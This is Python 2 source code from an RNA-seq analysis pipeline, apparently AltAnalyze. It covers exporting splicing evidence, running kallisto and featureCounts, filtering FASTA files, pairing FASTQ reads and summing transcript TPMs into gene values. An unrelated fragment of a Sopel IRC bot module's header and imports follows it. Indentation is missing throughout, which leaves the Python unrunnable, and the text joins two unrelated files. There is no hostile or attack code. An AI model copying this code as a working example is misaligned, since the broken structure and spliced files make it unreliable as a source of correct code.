score = string.join(scores,'|')
probesets = string.join(probesets,'|')
exonids_unique = unique.unique(exonids)
if len(exonids_unique) == 1: exonids = exonids_unique[0]
else: exonids = string.join(exonids,'|')
if len(genomic_location) == 1: genomic_location = genomic_location[0]
else: genomic_location = string.join(genomic_location,'|')
evidence = str(evidence)
if 'mutual' in direction: direction = 'mutual'
if len(ls) == 1:
probesets = jd.ProbesetDisplay()
direction = jd.Direction()
score = jd.Score()
method = jd.Method()
exonids = jd.ExonID()
evidence = jd.Evidence()
genomic_location = jd.GenomicLocation()
isoform_annotations = [jd.ProteinAnnotation(), jd.DomainInferred(), jd.DomainOverlap()]
try:
#if int(evidence)>4 and 'I' in uid: novel_exon = 'yes' ### high-evidence novel exon
#else: novel_exon = 'no'
if converted == True:
novel_exon = 'yes'
splicing_event = 'cassette-exon'
else:
novel_exon = 'no'
splicing_event = jd.SplicingEvent()
values = [uid, probesets, jd.Symbol(), jd.Description(), exonids, exon_level_confirmation, score, direction, splicing_event]
values += isoform_annotations+[method, str(evidence),novel_exon,jd.ExonExpStatus(),jd.GeneExpression(),genomic_location]
values = string.join(values,'\t')+'\n'
#if 'yes' in exon_level_confirmation:
export_data.write(values); n+=1
if exon_level_confirmation != 'no' and ('|' not in direction):
geneID = string.split(uid,':')[0]
try: relative_exon_exp = float(jd.ExonExpStatus())
except Exception: relative_exon_exp = 1
if firstEntry:
### Also export high-confidence predictions for GO-Elite
elite_export_path = string.split(results_dir,'AltResults')[0]+'GO-Elite/AltExonConfirmed/'+export_filename+'-junction-exon-evidence.txt'
elite_export_data = export.ExportFile(elite_export_path)
elite_export_data.write('GeneID\tEn\tExonID\tScores\tGenomicLocation\n')
firstEntry = False
if relative_exon_exp>0.10:
elite_export_data.write(string.join([geneID,'En',uid,score,genomic_location],'\t')+'\n')
#if 'DNA' in isoform_annotations[-1]:
if '2moter' not in jd.SplicingEvent() and '2lt-N' not in jd.SplicingEvent():
values = [uid, probesets, jd.Symbol(), jd.Description(), exonids, exon_level_confirmation, score, direction, splicing_event]
values += isoform_annotations+[method, str(evidence),novel_exon,jd.ExonExpStatus(),jd.GeneExpression(),genomic_location,export_filename]
values = string.join(values,'\t')+'\n'
combined_export_data.write(values)
except Exception, e:
#print traceback.format_exc();sys.exit()
pass ### Unknown error - not evaluated in 2.0.8 - isoform_annotations not referenced
print n,'exon IDs written to file.'
export_data.close()
try: elite_export_data.close()
except Exception: pass
clearObjectsFromMemory(regulated_critical_exons)
clearObjectsFromMemory(regulated_critical_exons_copy)
#print '!!!!Within comparison evidence'
#returnLargeGlobalVars()
def FeatureCounts(bed_ref, bam_file):
output = bam_file[:-4]+'__FeatureCounts.bed'
import subprocess
#if '/bin' in kallisto_dir: kallisto_file = kallisto_dir +'/apt-probeset-summarize' ### if the user selects an APT directory
kallisto_dir= 'AltDatabase/subreads/'
if os.name == 'nt':
featurecounts_file = kallisto_dir + 'PC/featureCounts.exe'; plat = 'Windows'
elif 'darwin' in sys.platform:
featurecounts_file = kallisto_dir + 'Mac/featureCounts'; plat = 'MacOSX'
elif 'linux' in sys.platform:
featurecounts_file = kallisto_dir + '/Linux/featureCounts'; plat = 'linux'
print 'Using',featurecounts_file
featurecounts_file = filepath(featurecounts_file)
featurecounts_root = string.split(featurecounts_file,'bin/featureCounts')[0]
print [featurecounts_file,"-a", "-F", "SAF",bed_ref, "-o", output, bam_file]
retcode = subprocess.call([featurecounts_file,"-a",bed_ref, "-F", "SAF", "-o", output, bam_file])
def filterFASTAFiles(fasta_files):
filter_fasta_files=[]
filter_dir = export.findParentDir(fasta_files[0])+'/filtered_fasta'
try: os.mkdir(filter_dir)
except Exception: pass
for file in fasta_files:
if 'filtered.fa' in file:
if file not in filter_fasta_files:
filter_fasta_files.append(file)
else:
filtered_fasta = file[:-3]+'-filtered.fa'
filter_fasta_files.append(filtered_fasta)
filename = export.findFilename(file)
eo=export.ExportFile(filtered_fasta)
for line in open(file,'rU').xreadlines():
if '>'==line[0]:
skip=False
### Exclude non-standard chromosomal transcripts
if 'PATCH' in line or '_1_' in line or '_1:' in line or ':HSCHR' in line or 'putative' in line or 'supercontig' in line or 'NOVEL_TEST' in line:
skip=True
else:
space_delim=string.split(line,' ')
space_delim=[string.split(space_delim[0],'.')[0]]+space_delim[1:]
line=string.join(space_delim,' ')
eo.write(line)
elif skip==False:
eo.write(line)
eo.close()
shutil.move(file,filter_dir+'/'+filename)
return filter_fasta_files
def getCoordinateFile(species):
geneCoordFile = 'AltDatabase/ensembl/'+species+'/'+species+'_Ensembl_transcript-annotations.txt'
geneCoordFile = unique.filepath(geneCoordFile)
status = verifyFile(geneCoordFile)
if status == 'not found':
try:
from build_scripts import EnsemblSQL
ensembl_version = string.replace(unique.getCurrentGeneDatabaseVersion(),'EnsMart','')
configType = 'Advanced'; analysisType = 'AltAnalyzeDBs'; externalDBName = ''; force = 'no'
EnsemblSQL.buildEnsemblRelationalTablesFromSQL(species,configType,analysisType,externalDBName,ensembl_version,force,buildCommand='exon')
except Exception:
#print traceback.format_exc()
print 'Failed to export a transcript-exon coordinate file (similar to a GTF)!!!!\n...Proceeding with standard Kallisto (no-splicing).'
geneCoordFile=None
return geneCoordFile
def runKallisto(species,dataset_name,root_dir,fastq_folder,mlp,returnSampleNames=False,customFASTA=None,log_output=True):
#print 'Running Kallisto...please be patient'
import subprocess
n_threads = mlp.cpu_count()
print 'Number of threads =',n_threads
#n_threads = 1
kallisto_dir_objects = os.listdir(unique.filepath('AltDatabase/kallisto'))
### Determine version
version = '0.43.1'
for subdir in kallisto_dir_objects:
if subdir.count('.')>1: version = subdir
kallisto_dir= 'AltDatabase/kallisto/'+version+'/'
if os.name == 'nt':
kallisto_file = kallisto_dir + 'PC/bin/kallisto.exe'; plat = 'Windows'
elif 'darwin' in sys.platform:
kallisto_file = kallisto_dir + 'Mac/bin/kallisto'; plat = 'MacOSX'
elif 'linux' in sys.platform:
kallisto_file = kallisto_dir + '/Linux/bin/kallisto'; plat = 'linux'
print 'Using',kallisto_file
kallisto_file = filepath(kallisto_file)
kallisto_root = string.split(kallisto_file,'bin/kallisto')[0]
fn = filepath(kallisto_file)
try: os.chmod(fn,0777) ### It's rare, but this can be a write issue
except: pass
output_dir=root_dir+'/ExpressionInput/kallisto/'
try: os.mkdir(root_dir+'/ExpressionInput')
except Exception: pass
try: os.mkdir(root_dir+'/ExpressionInput/kallisto')
except Exception: pass
fastq_folder += '/'
dir_list = read_directory(fastq_folder)
fastq_paths = []
for file in dir_list:
file_lower = string.lower(file)
if 'fastq' in file_lower and '._' not in file[:4]: ### Hidden files
fastq_paths.append(fastq_folder+file)
fastq_paths,paired = findPairs(fastq_paths)
### Check to see if Kallisto files already exist and use these if so (could be problematic but allows for outside quantification)
kallisto_tsv_paths=[]
dir_list = read_directory(output_dir)
for folder in dir_list:
kallisto_outdir = output_dir+folder+'/abundance.tsv'
status = os.path.isfile(kallisto_outdir)
if status:
            kallisto_tsv_paths.append(kallisto_outdir)
if returnSampleNames:
return fastq_paths
    ### Store/retrieve the Kallisto index in the Ensembl-specific SequenceData location
kallisto_index_root = 'AltDatabase/'+species+'/SequenceData/'
try: os.mkdir(filepath(kallisto_index_root))
except Exception: pass
indexFile = filepath(kallisto_index_root+species)
#indexFile = filepath(kallisto_index_root + 'Hs_intron')
indexStatus = os.path.isfile(indexFile)
if indexStatus == False or customFASTA!=None:
try: fasta_files = getFASTAFile(species)
except Exception: fasta_files = []
index_file = filepath(kallisto_index_root+species)
if len(fasta_files)==0 and customFASTA==None:
###download Ensembl fasta file to the above directory
from build_scripts import EnsemblSQL
ensembl_version = string.replace(unique.getCurrentGeneDatabaseVersion(),'EnsMart','')
try:
EnsemblSQL.getEnsemblTranscriptSequences(ensembl_version,species,restrictTo='cDNA')
fasta_files = getFASTAFile(species)
except Exception: pass
elif customFASTA!=None: ### Custom FASTA file supplied by the user
fasta_files = [customFASTA]
indexFile = filepath(kallisto_index_root+species+'-custom')
try: os.remove(indexFile) ### erase any pre-existing custom index
except Exception: pass
if len(fasta_files)>0:
print 'Building kallisto index file...'
arguments = [kallisto_file, "index","-i", indexFile]
fasta_files = filterFASTAFiles(fasta_files)
for fasta_file in fasta_files:
arguments.append(fasta_file)
try:
retcode = subprocess.call(arguments)
except Exception:
print traceback.format_exc()
if customFASTA!=None:
reimportExistingKallistoOutput = False
elif len(kallisto_tsv_paths) == len(fastq_paths):
reimportExistingKallistoOutput = True
elif len(kallisto_tsv_paths) > len(fastq_paths):
reimportExistingKallistoOutput = True ### If working with a directory of kallisto results
else:
reimportExistingKallistoOutput = False
if reimportExistingKallistoOutput:
print 'NOTE: Re-import PREVIOUSLY GENERATED kallisto output:',reimportExistingKallistoOutput
print '...To force re-analysis of FASTQ files, delete the folder "kallisto" in "ExpressionInput"'
### Just get the existing Kallisto output folders
fastq_paths = read_directory(output_dir)
kallisto_folders=[]
try:
import collections
expMatrix = collections.OrderedDict()
countMatrix = collections.OrderedDict()
countSampleMatrix = collections.OrderedDict()
sample_total_counts = collections.OrderedDict()
except Exception:
try:
import ordereddict
expMatrix = ordereddict.OrderedDict()
countMatrix = ordereddict.OrderedDict()
countSampleMatrix = ordereddict.OrderedDict()
sample_total_counts = ordereddict.OrderedDict()
except Exception:
expMatrix={}
countMatrix={}
countSampleMatrix={}
sample_total_counts={}
headers=['UID']
### Verify, import, create and/or ignore the transcript exon coordinate file for BAM file creation
geneCoordFile = getCoordinateFile(species)
for n in fastq_paths:
output_path = output_dir+n
kallisto_folders.append(output_path)
if reimportExistingKallistoOutput == False:
begin_time = time.time()
if geneCoordFile != None: ### For BAM and BED file generation
print 'Running kallisto on:',n,'...',
p=fastq_paths[n]
b=[" > "+n+'.sam']
bedFile = root_dir+ '/' + n + '__junction.bed'
kallisto_out = open(root_dir+ '/' + n + '.bam', 'ab')
if log_output:
err_out = open(output_dir + '/log.txt', 'a')
err_out.seek(0, 2) # Subprocess doesn't move the file pointer when appending!
else:
err_out = None
kallisto_out.seek(0, 2) # Subprocess doesn't move the file pointer when appending!
if paired == 'paired':
s=[]
else:
s=["--single","-l","200","-s","20"]
#geneCoordFile=None - force to run simple Kallisto
if geneCoordFile==None:
try: ### Without BAM and BED file generation
retcode = subprocess.call([kallisto_file, "quant","-i", indexFile, "-o", output_path]+s+p)
except Exception:
print traceback.format_exc()
else: ### Attempt to export BAM and BED files with Kallisto quantification
kallisto_command = [kallisto_file, "quant", "-i", indexFile, "-o", output_path,
"-g", geneCoordFile, "-j", bedFile, "--threads="+str(n_threads), "--sortedbam"] + s +p
kallisto_process = subprocess.Popen(kallisto_command, stdout=kallisto_out, stderr=err_out)
kallisto_process.communicate()
retcode = kallisto_process.returncode
if os.name == 'nt':
try:
sam_process = subprocess.Popen('AltDatabase\samtools\samtools.exe index ' + root_dir+ '/' + n + '.bam')
sam_process.communicate()
retcode_sam = sam_process.returncode
except: pass
#retcode = subprocess.call([kallisto_file, "quant","-i", indexFile, "-o", output_path,"--pseudobam"]+p+b)
#retcode = subprocess.call([kallisto_file, "quant","-i", indexFile, "-o", output_path]+p)
"""except Exception:
print traceback.format_exc()
kill
retcode = subprocess.call(['kallisto', "quant","-i", indexFile, "-o", output_path]+p)"""
if retcode == 0: print 'completed in', int(time.time()-begin_time), 'seconds'
else: print 'kallisto failed due to an unknown error (report to altanalyze.org help).'
#"""
input_path = output_path+'/abundance.txt'
try:
try: expMatrix,countMatrix,countSampleMatrix=importTPMs(n,input_path,expMatrix,countMatrix,countSampleMatrix)
except Exception:
input_path = output_path+'/abundance.tsv'
expMatrix,countMatrix,countSampleMatrix=importTPMs(n,input_path,expMatrix,countMatrix,countSampleMatrix)
headers.append(n)
sample_total_counts = importTotalReadCounts(n,output_path+'/run_info.json',sample_total_counts)
except Exception:
print traceback.format_exc()
sys.exit()
print n, 'TPM expression import failed'
if paired == 'paired':
print '\n...Make sure the paired-end samples were correctly assigned:'
print fastq_paths
for i in fastq_paths:
print 'Common name:',i,
for x in fastq_paths[i]:
print export.findParentDir(x),
print '\n'
### Summarize alignment information
for sample in countSampleMatrix:
try: estCounts = int(float(countSampleMatrix[sample]))
except Exception: estCounts='NA'
try: totalCounts = sample_total_counts[sample]
except Exception: totalCounts = 'NA'
try: aligned = str(100*estCounts/float(totalCounts))
except Exception: aligned = 'NA'
try: aligned = string.split(aligned,'.')[0]+'.'+string.split(aligned,'.')[1][:2]
except Exception: aligned = 'NA'
countSampleMatrix[sample] = [str(estCounts),totalCounts,aligned]
dataset_name = string.replace(dataset_name,'exp.','')
dataset_name = string.replace(dataset_name,'.txt','')
to = export.ExportFile(root_dir+'/ExpressionInput/transcript.'+dataset_name+'.txt')
ico = export.ExportFile(root_dir+'/ExpressionInput/isoCounts.'+dataset_name+'.txt')
go = export.ExportFile(root_dir+'/ExpressionInput/exp.'+dataset_name+'.txt')
co = export.ExportFile(root_dir+'/ExpressionInput/counts.'+dataset_name+'.txt')
so = export.ExportFile(root_dir+'/ExpressionInput/summary.'+dataset_name+'.txt')
exportMatrix(to,headers,expMatrix) ### Export transcript expression matrix
exportMatrix(ico,headers,countMatrix,counts=True) ### Export transcript count matrix
try:
geneMatrix = calculateGeneTPMs(species,expMatrix) ### calculate combined gene level TPMs
countsGeneMatrix = calculateGeneTPMs(species,countMatrix) ### calculate combined gene level TPMs
exportMatrix(go,headers,geneMatrix) ### export gene expression matrix
exportMatrix(co,headers,countsGeneMatrix,counts=True) ### export gene expression matrix
except Exception:
print 'AltAnalyze was unable to summarize gene TPMs from transcripts, proceeding with transcripts.'
export.copyFile(root_dir+'/ExpressionInput/transcript.'+dataset_name+'.txt',root_dir+'/ExpressionInput/exp.'+dataset_name+'.txt')
exportMatrix(so,['SampleID','Estimated Counts','Total Fragments','Percent Aligned'],countSampleMatrix) ### export gene expression matrix
### Copy results to the Kallisto_Results directory
try: os.mkdir(root_dir+'/ExpressionInput/Kallisto_Results')
except: pass
try:
tf = root_dir+'/ExpressionInput/transcript.'+dataset_name+'.txt'
shutil.copyfile(tf,string.replace(tf,'ExpressionInput','ExpressionInput/Kallisto_Results'))
tf = root_dir+'/ExpressionInput/isoCounts.'+dataset_name+'.txt'
shutil.copyfile(tf,string.replace(tf,'ExpressionInput','ExpressionInput/Kallisto_Results'))
tf = root_dir+'/ExpressionInput/exp.'+dataset_name+'.txt'
shutil.copyfile(tf,string.replace(tf,'ExpressionInput','ExpressionInput/Kallisto_Results'))
tf = root_dir+'/ExpressionInput/counts.'+dataset_name+'.txt'
shutil.copyfile(tf,string.replace(tf,'ExpressionInput','ExpressionInput/Kallisto_Results'))
tf = root_dir+'/ExpressionInput/summary.'+dataset_name+'.txt'
shutil.copyfile(tf,string.replace(tf,'ExpressionInput','ExpressionInput/Kallisto_Results'))
except:
print traceback.format_exc()
pass
def calculateGeneTPMs(species,expMatrix):
import gene_associations
try:
gene_to_transcript_db = gene_associations.getGeneToUid(species,('hide','Ensembl-EnsTranscript'))
if len(gene_to_transcript_db)<10:
raise ValueError('Ensembl-EnsTranscript file missing, forcing download of this file')
except Exception:
try:
print 'Missing transcript-to-gene associations... downloading from Ensembl.'
from build_scripts import EnsemblSQL
db_version = unique.getCurrentGeneDatabaseVersion()
EnsemblSQL.getGeneTranscriptOnly(species,'Basic',db_version,'yes')
gene_to_transcript_db = gene_associations.getGeneToUid(species,('hide','Ensembl-EnsTranscript'))
except Exception:
from build_scripts import GeneSetDownloader
print 'Ensembl-EnsTranscripts required for gene conversion... downloading from the web...'
GeneSetDownloader.remoteDownloadEnsemblTranscriptAssocations(species)
gene_to_transcript_db = gene_associations.getGeneToUid(species,('hide','Ensembl-EnsTranscript'))
if len(gene_to_transcript_db)<10:
print 'NOTE: No valid Ensembl-EnsTranscripts available, proceeding with the analysis of transcripts rather than genes...'
from import_scripts import OBO_import
transcript_to_gene_db = OBO_import.swapKeyValues(gene_to_transcript_db)
gene_matrix = {}
present_gene_transcripts={}
for transcript in expMatrix:
if '.' in transcript:
transcript_alt = string.split(transcript,'.')[0]
else:
transcript_alt = transcript
if transcript_alt in transcript_to_gene_db:
gene = transcript_to_gene_db[transcript_alt][0]
try: present_gene_transcripts[gene].append(transcript)
except Exception: present_gene_transcripts[gene] = [transcript]
else: pass ### could keep track of the missing transcripts
for gene in present_gene_transcripts:
gene_values = []
for transcript in present_gene_transcripts[gene]:
gene_values.append(map(float,expMatrix[transcript]))
        gene_tpms = [sum(value) for value in zip(*gene_values)] ### sum of all transcript TPMs per sample
gene_tpms = map(str,gene_tpms)
gene_matrix[gene] = gene_tpms
if len(gene_matrix)>0:
return gene_matrix
else:
print "NOTE: No valid transcript-gene associations available... proceeding with Transcript IDs rather than gene."
return expMatrix
def exportMatrix(eo,headers,matrix,counts=False):
eo.write(string.join(headers,'\t')+'\n')
for gene in matrix:
values = matrix[gene]
if counts:
values = map(str,map(int,map(float,values)))
eo.write(string.join([gene]+values,'\t')+'\n')
eo.close()
def importTPMs(sample,input_path,expMatrix,countMatrix,countSampleMatrix):
firstLine=True
for line in open(input_path,'rU').xreadlines():
data = cleanUpLine(line)
if firstLine:
firstLine=False
header = string.split(data,'\t')
else:
target_id,length,eff_length,est_counts,tpm = string.split(data,'\t')
try: float(est_counts);
except Exception: ### nan instead of float found due to lack of alignment
est_counts = '0.0'
tpm = '0.0'
if '.' in target_id:
target_id = string.split(target_id,'.')[0] ### Ensembl isoform IDs in more recent Ensembl builds
try: expMatrix[target_id].append(tpm)
except Exception: expMatrix[target_id]=[tpm]
try: countSampleMatrix[sample]+=float(est_counts)
except Exception: countSampleMatrix[sample]=float(est_counts)
try: countMatrix[target_id].append(est_counts)
except Exception: countMatrix[target_id]=[est_counts]
return expMatrix,countMatrix,countSampleMatrix
def importTotalReadCounts(sample,input_path,sample_total_counts):
### Import from Kallisto Json file
for line in open(input_path,'rU').xreadlines():
data = cleanUpLine(line)
if "n_processed: " in data:
total = string.split(data,"n_processed: ")[1]
total = string.split(total,',')[0]
sample_total_counts[sample]=total
return sample_total_counts
def findPairs(fastq_paths):
#fastq_paths = ['/Volumes/test/run0718_lane12_read1_index701=Kopan_RBP_02_14999.fastq.gz','/Volumes/run0718_lane12_read2_index701=Kopan_RBP_02_14999.fastq.gz']
import export
read_notation=0
under_suffix_notation=0
suffix_notation=0
equal_notation=0
suffix_db={}
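    ### Heuristically detect the paired-end naming convention used (read1/read2, pair1/pair2, R1/R2, _1./_2., or name=sample)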
for i in fastq_paths:
        if 'read1' in i or 'read2' in i or 'pair1' in i or 'pair2' in i or 'R1' in i or 'R2' in i:
read_notation+=1
f = export.findFilename(i)
if 'fastq' in f:
name = string.split(f,'fastq')[0]
elif 'FASTQ' in f:
name = string.split(f,'FASTQ')[0]
elif 'fq' in f:
name = string.split(f,'fq')[0]
if '_1.' in name or '_2.' in name:
under_suffix_notation+=1
elif '1.' in name or '2.' in name:
suffix_notation+=1
suffix_db[name[-2:]]=[]
if '=' in name:
equal_notation+=1
if read_notation==0 and suffix_notation==0 and under_suffix_notation==0:
new_names={}
for i in fastq_paths:
if '/' in i or '\\' in i:
n = export.findFilename(i)
if '=' in n:
n = string.split(n,'=')[1]
new_names[n] = [i]
### likely single-end samples
return new_names, 'single'
else:
new_names={}
paired = 'paired'
if equal_notation==len(fastq_paths):
for i in fastq_paths:
name = string.split(i,'=')[-1]
name = string.replace(name,'.fastq.gz','')
name = string.replace(name,'.fastq','')
name = string.replace(name,'.FASTQ.gz','')
name = string.replace(name,'.FASTQ','')
name = string.replace(name,'.fq.gz','')
name = string.replace(name,'.fq','')
if '/' in name or '\\' in name:
name = export.findFilename(name)
if '=' in name:
name = string.split(name,'=')[1]
try: new_names[name].append(i)
except Exception: new_names[name]=[i]
else:
for i in fastq_paths:
if suffix_notation == len(fastq_paths) and len(suffix_db)==2: ### requires that files end in both .1 and .2
pairs = ['1.','2.']
else:
pairs = ['-read1','-read2','-pair1','-pair2','_read1','_read2','_pair1','_pair2','read1','read2','pair1','pair2','_1.','_2.','_R1','_R2','-R1','-R2','R1','R2']
n=str(i)
n = string.replace(n,'fastq.gz','')
n = string.replace(n,'fastq','')
for p in pairs: n = string.replace(n,p,'')
if '/' in n or '\\' in n:
n = export.findFilename(n)
if '=' in n:
n = string.split(n,'=')[1]
if n[-1]=='.':
n = n[:-1] ###remove the last decimal
try: new_names[n].append(i)
except Exception: new_names[n]=[i]
for i in new_names:
if len(new_names[i])>1:
pass
else:
paired = 'single'
new_names = checkForMultipleLanes(new_names)
return new_names, paired
def checkForMultipleLanes(new_names):
""" This function further aggregates samples run across multiple flowcells """
read_count = 0
lane_count = 0
updated_names={}
for sample in new_names:
reads = new_names[sample]
count=0
for read in reads:
read_count+=1
            if '_L00' in read and '_001' in read:
### assumes no more than 9 lanes/sample
count+=1
if len(reads) == count: ### Multiple lanes run per sample
lane_count+=count
if lane_count==read_count:
for sample in new_names:
sample_v1 = string.replace(sample,'_001','')
sample_v1 = string.split(sample_v1,'_L00')
if len(sample_v1[-1])==1: ### lane number
sample_v1 = sample_v1[0]
if sample_v1 in updated_names:
updated_names[sample_v1]+=new_names[sample]
else:
updated_names[sample_v1]=new_names[sample]
if len(updated_names)==0:
updated_names = new_names
return updated_names
def getFASTAFile(species):
fasta_folder = 'AltDatabase/'+species+'/SequenceData/'
fasta_files=[]
dir_list = read_directory(filepath(fasta_folder))
for file in dir_list:
if '.fa' in file:
fasta_files.append(filepath(fasta_folder)+file)
return fasta_files
if __name__ == '__main__':
samplesDiffering = 3
column_method = 'hopach'
species = 'Hs'
excludeCellCycle = False
platform = 'RNASeq'; graphic_links=[('','/Volumes/HomeBackup/CCHMC/PBMC-10X/ExpressionInput/SamplePrediction/DataPlots/Clustering-33k_CPTT_matrix-CORRELATED-FEATURES-iterFilt-hierarchical_cosine_cosine.txt')]
"""
graphic_links,new_results_file = correlateClusteredGenes(platform,graphic_links[-1][-1][:-4]+'.txt',
numSamplesClustered=samplesDiffering,excludeCellCycle=excludeCellCycle,graphics=graphic_links,
ColumnMethod=column_method, transpose=True, includeMoreCells=True)
"""
import UI; import multiprocessing as mlp
#runKallisto('Mm','BoneMarrow','/Users/saljh8/Desktop/dataAnalysis/SalomonisLab/altanalyze/Mm-FASTQ','/Users/saljh8/Desktop/dataAnalysis/SalomonisLab/altanalyze/Mm-FASTQ',mlp);sys.exit()
runKallisto('Hs','BreastCancer','/Users/saljh8/Desktop/dataAnalysis/SalomonisLab/BreastCancerDemo/FASTQs/input','/Users/saljh8/Desktop/dataAnalysis/SalomonisLab/BreastCancerDemo/FASTQs/input',mlp);sys.exit()
results_file = '/Users/saljh8/Desktop/dataAnalysis/SalomonisLab/l/July-2017/PSI/test/Clustering-exp.round2-Guide3-hierarchical_cosine_correlation.txt'
#correlateClusteredGenesParameters(results_file,rho_cutoff=0.3,hits_cutoff=4,hits_to_report=50,ReDefinedClusterBlocks=True,filter=True)
#sys.exit()
#correlateClusteredGenes('exons',results_file,stringency='strict',rhoCutOff=0.6);sys.exit()
#sys.exit()
species='Hs'; platform = "3'array"; vendor = "3'array"
#FeatureCounts('/Users/saljh8/Downloads/subread-1.5.2-MaxOSX-x86_64/annotation/mm10_AltAnalyze.txt', '/Users/saljh8/Desktop/Grimes/GEC14074/Grimes_092914_Cell12.bam')
#sys.exit()
import UI; import multiprocessing as mlp
gsp = UI.GeneSelectionParameters(species,platform,vendor)
gsp.setGeneSet('None Selected')
gsp.setPathwaySelect('')
gsp.setGeneSelection('')
gsp.setJustShowTheseIDs('')
gsp.setNormalize('median')
gsp.setSampleDiscoveryParameters(1,50,4,4,
True,'gene','protein_coding',False,'cosine','hopach',0.4)
#expFile = '/Users/saljh8/Desktop/Grimes/KashishNormalization/test/Original/ExpressionInput/exp.CombinedSingleCell_March_15_2015.txt'
expFile = '/Volumes/My Passport/salomonis2/SRP042161_GBM-single-cell/bams/ExpressionInput/exp.GBM_scRNA-Seq-steady-state.txt'
#singleCellRNASeqWorkflow('Hs', "RNASeq", expFile, mlp, parameters=gsp);sys.exit()
filename = '/Users/saljh8/Desktop/dataAnalysis/Collaborative/Grimes/Trumpp-HSC-2017/counts.rawTrumpp.txt'
filename = '/Volumes/salomonis2/Erica-data/GSE98451/counts.GSE98451_uterus_single_cell_RNA-Seq_counts-Ensembl.txt'
#fastRPKMCalculate(filename);sys.exit()
#calculateRPKMsFromGeneCounts(filename,'Mm',AdjustExpression=False);sys.exit()
#copyICGSfiles('','');sys.exit()
import multiprocessing as mlp
import UI
species='Mm'; platform = "3'array"; vendor = 'Ensembl'
gsp = UI.GeneSelectionParameters(species,platform,vendor)
gsp.setGeneSet('None Selected')
gsp.setPathwaySelect('')
gsp.setGeneSelection('')
gsp.setJustShowTheseIDs('')
gsp.setNormalize('median')
gsp.setSampleDiscoveryParameters(0,0,1.5,3,
False,'PSI','protein_coding',False,'cosine','hopach',0.35)
#gsp.setSampleDiscoveryParameters(1,1,4,3, True,'Gene','protein_coding',False,'cosine','hopach',0.5)
filename = '/Volumes/SEQ-DATA/AML_junction/AltResults/AlternativeOutput/Hs_RNASeq_top_alt_junctions-PSI-clust.txt'
#fastRPKMCalculate(filename);sys.exit()
results_file = '/Volumes/SEQ-DATA/Grimes/14018_gmp-pro/ExpressionInput/DataPlots/400 fold for at least 4 samples/Clustering-myeloblast-steady-state-correlated-features-hierarchical_euclidean_cosine-hopach.txt'
guideGeneFile = '/Volumes/SEQ-DATA/Grimes/14018_gmp-pro/ExpressionInput/drivingTFs-symbol.txt'
expFile = '/Users/saljh8/Desktop/Grimes/KashishNormalization/3-25-2015/ExpressionInput/exp.CombinedSingleCell_March_15_2015.txt'
expFile = '/Users/saljh8/Desktop/dataAnalysis/Mm_Kiddney_tubual/ExpressionInput/exp.E15.5_Adult_IRI Data-output.txt'
expFile = '/Users/saljh8/Desktop/PCBC_MetaData_Comparisons/temp/C4Meth450-filtered-SC-3_regulated.txt'
expFile = '/Volumes/SEQ-DATA/Grimeslab/TopHat/AltResults/AlternativeOutput/Mm_RNASeq_top_alt_junctions-PSI-clust-filter.txt'
expFile = '/Users/saljh8/Documents/L_TargetPSIFiles/exp.TArget_psi_noif_uncorr_03-50missing-12high.txt'
expFile = '/Volumes/BOZEMAN2015/Hs_RNASeq_top_alt_junctions-PSI-clust-filter.txt'
singleCellRNASeqWorkflow('Hs', "exons", expFile, mlp, exp_threshold=0, rpkm_threshold=0, parameters=gsp);sys.exit()
#expFile = '/Users/saljh8/Desktop/Grimes/AltSplice/Gmp-cluster-filter.txt'
#singleCellRNASeqWorkflow('Mm', "exons", expFile, mlp, exp_threshold=0, rpkm_threshold=0, parameters=gsp);sys.exit()
#expFile = '/Users/saljh8/Downloads/methylation/ExpressionInput/exp.female-steady-state.txt'
#singleCellRNASeqWorkflow('Hs', 'RNASeq', expFile, mlp, exp_threshold=50, rpkm_threshold=5) # drivers=guideGeneFile)
#sys.exit()
#correlateClusteredGenes(results_file);sys.exit()
#reformatExonFile('Hs','exon',True);sys.exit()
filename = '/Volumes/Time Machine Backups/dataAnalysis/PCBC_Sep2013/C4-reference/ExpressionInput/counts.C4.txt'
#fastRPKMCalculate(filename);sys.exit()
file1 = '/Volumes/My Passport/dataAnalysis/CardiacRNASeq/BedFiles/ExpressionInput/exp.CardiacRNASeq.txt'
file2 = '/Volumes/Time Machine Backups/dataAnalysis/PCBC_Sep2013/C4-reference/ReferenceComps/ExpressionInput/counts.C4.txt'
#getHighExpNovelExons('Hs',file1);sys.exit()
#mergeCountFiles(file1,file2); sys.exit()
import UI
test_status = 'yes'
data_type = 'ncRNA'
data_type = 'mRNA'
array_type = 'RNASeq'
array_type = 'junction'
species = 'Hs' ### edit this
summary_results_db = {}
root_dir = '/Volumes/Time Machine Backups/dataAnalysis/Human Blood/Exon/Multiple Sclerosis/Untreated_MS-analysis/'
#root_dir = '/Volumes/Time Machine Backups/dataAnalysis/Human Blood/Exon/Multiple Sclerosis/2-3rds_training-untreated/'
root_dir = '/Volumes/SEQ-DATA/Grimes/14018_gmp-pro/400-original/'
#root_dir = '/Volumes/My Passport/dataAnalysis/PCBC_Dec2013/All/bedFiles/'
root_dir = '/Users/saljh8/Desktop/dataAnalysis/HTA2.0 Files/'
#summary_results_db['Hs_Junction_d14_vs_d7.p5_average-ASPIRE-exon-inclusion-results.txt'] = [] ### edit this
#summary_results_db['Hs_Junction_d14_vs_d7.p5_average-splicing-index-exon-inclusion-results.txt'] = [] ### edit this
results_dir = root_dir +'AltResults/AlternativeOutput/'
dir_list = read_directory(results_dir)
for i in dir_list:
if '_average' in i:
comparison, end = string.split(i,'_average')
if '-exon-inclusion-results.txt' in i: summary_results_db[comparison]=[]
compareExonAndJunctionResults(species,array_type,summary_results_db,root_dir); sys.exit()
fl = UI.ExpressionFileLocationData('','','',''); fl.setCELFileDir(loc); fl.setRootDir(loc)
exp_file_location_db={}; exp_file_location_db['test']=fl
alignJunctionsToEnsembl(species,exp_file_location_db,'test'); sys.exit()
getEnsemblAssociations(species,data_type,test_status,'yes'); sys.exit()
|
bot.py
|
# Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
# Copyright 2012-2015, Elsie Powell, http://embolalia.com
# Copyright 2019, Florian Strzelecki <florian.strzelecki@gmail.com>
#
# Licensed under the Eiffel Forum License 2.
from __future__ import generator_stop
from ast import literal_eval
from datetime import datetime
import itertools
import logging
import re
import signal
import threading
import time
from typing import Optional
from sopel import irc, logger, plugins, tools
from sopel.db import SopelDB
import sopel.loader
from sopel.module import NOLIMIT
from sopel.plugins import jobs as plugin_jobs, rules as plugin_rules
from sopel.tools import deprecated, Identifier
import sopel.tools.jobs
from sopel.trigger import Trigger
__all__ = ['Sopel', 'SopelWrapper']
